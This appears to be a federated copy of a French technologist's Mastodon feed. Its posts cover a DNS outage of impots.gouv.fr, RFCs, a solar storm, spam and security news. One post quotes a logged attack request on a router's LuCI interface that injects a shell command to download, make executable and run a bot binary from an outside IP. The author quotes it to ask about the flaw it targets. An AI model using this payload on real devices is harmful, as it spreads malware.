@bortzmeyer@mastodon.gougere.fr
@bortzmeyer@mastodon.gougere.fr avatar

bortzmeyer

@bortzmeyer@mastodon.gougere.fr

Je parle surtout d'informatique / I talk mostly about computing.

This profile is from a federated server and may be incomplete. Browse more on the original instance.

bortzmeyer, to random French
@bortzmeyer@write.as avatar

Depuis dimanche 12 mai 2024, dans la soirée, plusieurs personnes signalent sur les réseaux sociaux une « panne du site impots.gouv.fr ». Il s'agit d'un problème DNS (Domain Name System) lui-même probablement dû à un problème de routage. Le problème n'affecte que certains opérateurs. Les résolveurs DNS répondent avec le code SERVFAIL (Server Failure) et, s'ils fournissent les EDE (Extended DNS Error), précisent quelque chose comme « NOREACHABLEAUTHORITY ». En effet, impots.gouv.fr n'a que deux serveurs faisant autorité, ce qui est clairement insuffisant pour un domaine aussi critique et, pire, tous les deux sont dans le même AS (Autonomous System), le 34177 (l'opérateur Celeste). Un problème de routage entre l'opérateur où se trouve votre résolveur DNS et Celeste et paf, plus d'impots.gouv.fr. Vu par les sondes RIPE Atlas, voici la situation au matin du lundi 13 mai :

% blaeu-resolve --requested 200 --country FR --ipv4 --type A  impots.gouv.fr
[145.242.11.100] : 125 occurrences 
[ERROR: SERVFAIL] : 61 occurrences 
Test #71358106 done at 2024-05-13T06:48:09Z

On voit qu'environ le tiers des sondes RIPE Atlas en France ont un problème à résoudre ce nom.

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@vincib @bortzmeyer Ou, s'ils n'ont pas confiance en une entreprise privée capitaliste, ils pourraient trouver un secondaire dans un autre des innombrables services de l'État, et gratuitement. (Mais ça ne se fera pas, car il faudrait dix réunions interministérielles avec vingt directeurs divers).

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F14.225.204.172%2Fhelp+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60)

Ya une faille dans OpenWRT ?

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

RFC 9562: Universally Unique IDentifiers (UUIDs)

Ce normalise les , une famille d'identificateurs uniques, obtenus sans registre central. Il remplace l'ancienne norme, le RFC 4122, avec pas mal de nouveautés et un RFC complètement refait.

https://www.bortzmeyer.org/9562.html

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Lu chez un artisan, peint au mur : « ceux qui croivent font erreur ».

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Le Soleil est bien énervé depuis avant-hier. Attendez-vous à ce que les liens radio déconnent.
https://www.swpc.noaa.gov/news/media-advisory-noaa-forecasts-severe-solar-storm-media-availability-scheduled-friday-may-10
gemini://gemini.bortzmeyer.org/presto/

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

Les jolies images : https://www.youtube.com/watch?v=bKGlGCIiyZE

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

Et à SIDC https://www.sidc.be/ :

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

Ah, c'est déjà dans WIkipédia :-) https://en.wikipedia.org/wiki/List_of_solar_storms

@tnoisette

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

Article qui cite comme référence, non pas le communiqué de la NOAA (la météo étatsunienne) mais le tabloid pourri The Sun (remarquez, le nom convient), qui fait preuve de sa nuance et de sa subtilité habituelle « THE biggest solar storm in two decades could wipe out GPS satellites and power grids today, space weather forecasters have warned. »

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

Bon, je dis à mes serveurs « Brace yourself, solar storm is coming »

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

C'est dur. On crée une cagnotte ? https://www.francetvinfo.fr/les-jeux-olympiques/paris-2024/paris-2024-la-grande-desillusion-des-particuliers-qui-esperaient-louer-leur-appartement-a-des-prix-vertigineux_6520667.html

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Le spam du jour me dit « Nous sommes une plateforme qui peut fournir à Afnic les meillieurs [sic] IT experts de l’Est à distance pour optimiser votre processus de travail et commencer à
vous aider rapidement. Vous pouvez engager qu'un seul développeur ou une
équipe entière d’IT experts avec un manager personnel. »

Des experts de l'Est, c'est le Mordor, la Chine ou la Pologne ?

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@R1Rail Tout est relatif.

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Oulah, CVE-2024-27322 a l'air méchant. Si vous programmez en R ou bien utilisez des programmes écrits en R, mettez à jour !

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Sortie de #PandApache version 3. (Blague ou délire psy, je ne sais pas.) https://dev.to/pykpyky/pandapache3-le-tueur-dapache-580g

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Sinon, si vous aimez la science-fiction vintage, la première (?) adaptation télévisée de Flash Gordon est sur YouTube https://www.youtube.com/watch?v=m3peCx8pAIM Garanti 100 % premier degré.

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Je ne connaissais pas le RFC 3442.

C'est lui qui normalise l'option DHCP 121 qui permet l'attaque contre les .

https://arstechnica.com/security/2024/05/novel-attack-against-virtually-all-vpn-apps-neuters-their-entire-purpose/

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

@Framasoft "Your account [Framagit] has been deactivated" "Les comptes sont désactivés après un an sans activité" C'est du grand n'importe quoi, j'utilise régulièrement .

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@Framasoft En plus, c'est même pas vrai, je peux me loguer, faire des git pull...

Tentative de hameçonnage ? Mais le message semble correct.

Bogue ?

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@Framasoft Par exemple, rien qu'en 2024, j'ai eu six messages "framagit.org sign-in from new location" donc le logiciel qui dit que je n'ai pas eu d'activité depuis un an se trompe.

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@dleberre @Framasoft Je trouve le message pas clair et même un peu effrayant.

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@framasky @dleberre @ache @Framasoft Je me suis connecté et on ne m'a pas demandé d'accepter de nouvelles CGU.

Natouille, to random French
@Natouille@mastodon.tetaneutral.net avatar

ypleu bocou

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@shaft @Natouille

bortzmeyer,
@bortzmeyer@mastodon.gougere.fr avatar

@gregr @shaft @Natouille C'est pas très French Tech.

bortzmeyer, to random French
@bortzmeyer@mastodon.gougere.fr avatar

Le spam du jour dit « Je serai ravie de faire votre connaissance. Si par chance, vous avez l'avis de croire en une belle Rencontre contactez-moi directement », ce qui est banal mais plus drôle est qu'il prétend venir du domaine sorbonne-universite.fr (et le nom devant le @ est bien celui d'une chercheuse à l'Université Paris IV - Sorbonne)

  • All
  • Subscribed
  • Moderated
  • Favorites
  • cisconetworking
  • tsrsr
  • DreamBathrooms
  • thenastyranch
  • magazineikmin
  • everett
  • hgfsjryuu7
  • Youngstown
  • slotface
  • khanakhh
  • rosin
  • ngwrru68w68
  • kavyap
  • PowerRangers
  • Leos
  • GTA5RPClips
  • modclub
  • vwfavf
  • osvaldo12
  • InstantRegret
  • ethstaker
  • Durango
  • mdbf
  • tester
  • normalnudes
  • cubers
  • tacticalgear
  • anitta
  • All magazines
    •